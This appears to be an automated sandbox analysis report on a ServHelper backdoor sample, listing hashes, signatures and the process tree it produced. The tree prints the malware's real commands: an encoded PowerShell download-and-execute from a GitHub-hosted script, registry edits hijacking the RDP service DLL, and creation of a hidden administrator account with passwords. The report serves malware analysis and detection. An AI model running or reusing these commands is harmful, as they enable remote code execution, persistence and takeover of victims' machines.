Analysis
-
max time kernel
145s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 13:36
Static task
static1
Behavioral task
behavioral1
Sample
b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe
Resource
win10v2004-20231215-en
General
-
Target
b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe
-
Size
6.7MB
-
MD5
2b6ad7f446fe56f8bb5438a4784afe78
-
SHA1
15f5584e569668013548b2f27a417a6482c9317f
-
SHA256
b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80
-
SHA512
160537e84ecc2694b514482b95dd70c03abc4580de2cd6f2ae38d332bf4446cbbf9a66676be87a8f4ca25b68be5533342af1d6ebde33577a0aff6a3004800bee
-
SSDEEP
98304:gOOles66ycm4i+stzTTOzAElMLmZ7oo8kTApKGaRqc4O1XujlqEBLMkqzEoe:Ns6cizZTTLmxoQT7RRq4ujlBBTqz3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2448 powershell.exe 6 2448 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2292 takeown.exe 2364 icacls.exe 2060 icacls.exe 1628 icacls.exe 776 icacls.exe 544 icacls.exe 2112 icacls.exe 1952 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1028 1028 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 544 icacls.exe 2112 icacls.exe 1952 icacls.exe 2292 takeown.exe 2364 icacls.exe 2060 icacls.exe 1628 icacls.exe 776 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 4 raw.githubusercontent.com 5 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W9K2TF2WKHERWSJB3B3M.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7008411f4c8bda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2648 powershell.exe 2500 powershell.exe 2812 powershell.exe 1776 powershell.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 2448 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
Processes:
pid process 476 1028 1028 1028 1028 1028 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeRestorePrivilege 2060 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1076 WMIC.exe Token: SeIncreaseQuotaPrivilege 1076 WMIC.exe Token: SeAuditPrivilege 1076 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1076 WMIC.exe Token: SeIncreaseQuotaPrivilege 1076 WMIC.exe Token: SeAuditPrivilege 1076 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1356 WMIC.exe Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeAuditPrivilege 1356 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1356 WMIC.exe Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeAuditPrivilege 1356 WMIC.exe Token: SeDebugPrivilege 2448 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 3000 wrote to memory of 2648 3000 b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe powershell.exe PID 3000 wrote to memory of 2648 3000 b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe powershell.exe PID 3000 wrote to memory of 2648 3000 b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe powershell.exe PID 2648 wrote to memory of 2768 2648 powershell.exe csc.exe PID 2648 wrote to memory of 2768 2648 powershell.exe csc.exe PID 2648 wrote to memory of 2768 2648 powershell.exe csc.exe PID 2768 wrote to memory of 2728 2768 csc.exe cvtres.exe PID 2768 wrote to memory of 2728 2768 csc.exe cvtres.exe PID 2768 wrote to memory of 2728 2768 csc.exe cvtres.exe PID 2648 wrote to memory of 2500 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2500 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2500 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2812 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2812 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2812 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 1776 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 1776 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 1776 2648 powershell.exe powershell.exe PID 2648 wrote to memory of 2292 2648 powershell.exe takeown.exe PID 2648 wrote to memory of 2292 2648 powershell.exe takeown.exe PID 2648 wrote to memory of 2292 2648 powershell.exe takeown.exe PID 2648 wrote to memory of 2364 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2364 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2364 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2060 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2060 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2060 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1628 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1628 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1628 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 776 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 776 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 776 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 544 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 544 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 544 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2112 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2112 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 2112 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1952 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1952 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1952 2648 powershell.exe icacls.exe PID 2648 wrote to memory of 1712 2648 powershell.exe reg.exe PID 2648 wrote to memory of 1712 2648 powershell.exe reg.exe PID 2648 wrote to memory of 1712 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2848 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2848 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2848 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2604 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2604 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2604 2648 powershell.exe reg.exe PID 2648 wrote to memory of 2276 2648 powershell.exe net.exe PID 2648 wrote to memory of 2276 2648 powershell.exe net.exe PID 2648 wrote to memory of 2276 2648 powershell.exe net.exe PID 2276 wrote to memory of 1264 2276 net.exe net1.exe PID 2276 wrote to memory of 1264 2276 net.exe net1.exe PID 2276 wrote to memory of 1264 2276 net.exe net1.exe PID 2648 wrote to memory of 984 2648 powershell.exe cmd.exe PID 2648 wrote to memory of 984 2648 powershell.exe cmd.exe PID 2648 wrote to memory of 984 2648 powershell.exe cmd.exe PID 984 wrote to memory of 2968 984 cmd.exe cmd.exe PID 984 wrote to memory of 2968 984 cmd.exe cmd.exe PID 984 wrote to memory of 2968 984 cmd.exe cmd.exe PID 2968 wrote to memory of 1856 2968 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe"C:\Users\Admin\AppData\Local\Temp\b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mvx2hmfm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3DAD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3DAC.tmp"4⤵PID:2728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2292
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2364
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1628
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:776
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2112
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1952
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1712
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2848
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2604
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1264
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2376
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1724
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:944
-
C:\Windows\system32\net.exenet start TermService5⤵PID:436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1756
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2948
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:1392
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc wugqLn6z /add1⤵PID:568
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc wugqLn6z /add2⤵PID:900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc wugqLn6z /add3⤵PID:908
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2384
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" IZKCKOTP$ /ADD1⤵PID:2336
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" IZKCKOTP$ /ADD2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IZKCKOTP$ /ADD3⤵PID:844
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:2392
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc wugqLn6z1⤵PID:1752
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc wugqLn6z2⤵PID:1992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc wugqLn6z3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2168
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1920
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2584
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5291a943b58ccf052ee89558f452db5f4
SHA15f0ec79e3c629ad68a74f0dfd642a9449c8613be
SHA256bdc751e08cdc75a79400fdbd838c6640e8f237115695e661e2c4e505c9773b63
SHA5127d47f31c62e409121df1ff9093d198e24d757f67a01797e15bdcaf17731490c9f986f63ed22fcdcac537a753b4e622666f17a31752a04549c05a72db17b0145a
-
Filesize
2.5MB
MD55db5ffa607b5b5ca17bfd6fb78403660
SHA11e793958cb1dd1dc99da4a50beaa2945561b7a16
SHA2561fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89
SHA5123d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43
-
Filesize
3KB
MD594d4d2c6d8a614e0c8a9af39d295aecf
SHA183959eca6265afc72fa96ed30bfcd84a747d8add
SHA256d3b54ba7d714c76e3b907da232087e6b84e61ae28412f2408d15be3228ba7413
SHA512a545b59dc42cd424cf781299064321242498fba16007e44e4c31dd35885ddf955ac9e9d4d4be8718a297a94af518df3ba7d059bd2fd1a71fe7af8a028eeb04f7
-
Filesize
7KB
MD56810d5291ffa432c5286b0d70d82f1e5
SHA19f4be386c681dbae750a002f1808d6e1a3c9a871
SHA256ea6d822235e1d0c43988b574aa6046d755005419f1af8841747363d91002aaa1
SHA5121964f0fd4db40c1b8e1ae674441cd0dc7ccf287c3ba4d8ff818ebebec02351d627d772f2b067c52350846487a54f2be1af208e2f8be873add76b9c19d5cea586
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cd45d55cb02bfdb018a9d8ca83945d2d
SHA169653240dd801791e8b99a9d9c419950fc0d247f
SHA25658c1c8cf8ca631b833c3b1eae29e5c80eefb76111c4cf16a7b6c128861ca0a81
SHA512750c1bbb8afe0f65527adae60d31f725c29b9e3ff33ae2679515a02a289a9fe9baed567ed3ee9d610eb5d32e61fa0e009ea8fc01f0156b6b81ed159d11782ce4
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD58bf5136cebed0dffe27da0e26be18792
SHA19dea0af577b93042775a7a461fd9d3f9b885c4c3
SHA2564722cd19570a78e9f4d02a0d8d99f5c5ccb5e7820e716d4d7f056cd132e3f6d7
SHA5128bccf67fa90e225c1142ee91018f6c271c3687fbd497a2e29ed8fe51a750685fb3085006b72cb0b9261788be2d4b7f4ecbbd42c9c2d9350888baba64bbb53e2d
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD58f584858b7edb9e4e7ec8d974c3c5fd9
SHA1215e6aae71a477c2c18993091d502d8a77973aa2
SHA25673b56629d4af5fa0b2c7481c0a554fc52d0a813fe831796235b84eda55c0afa4
SHA512ef68c3af1662fa3d8e6b3407dd0e272bc4357c77894ad1171050e51b74b5ce0e4240d8fccc2c499512911ba5c1191bc2b3a2fbc95bcffff7f15aa96e1ca3061c
-
Filesize
60KB
MD596e498a3833f52ae46bcfdc391f73cf7
SHA1ecaf72b46cf1cb074bde2914963bb1e61450ca95
SHA25621a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b
SHA5129f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540
-
Filesize
743KB
MD52ee3d03bb1f8bd257235fc70e92b17e1
SHA1c36482b8f8229578dec1cc687aaf53084cb6d05e
SHA256b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0
SHA51239f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea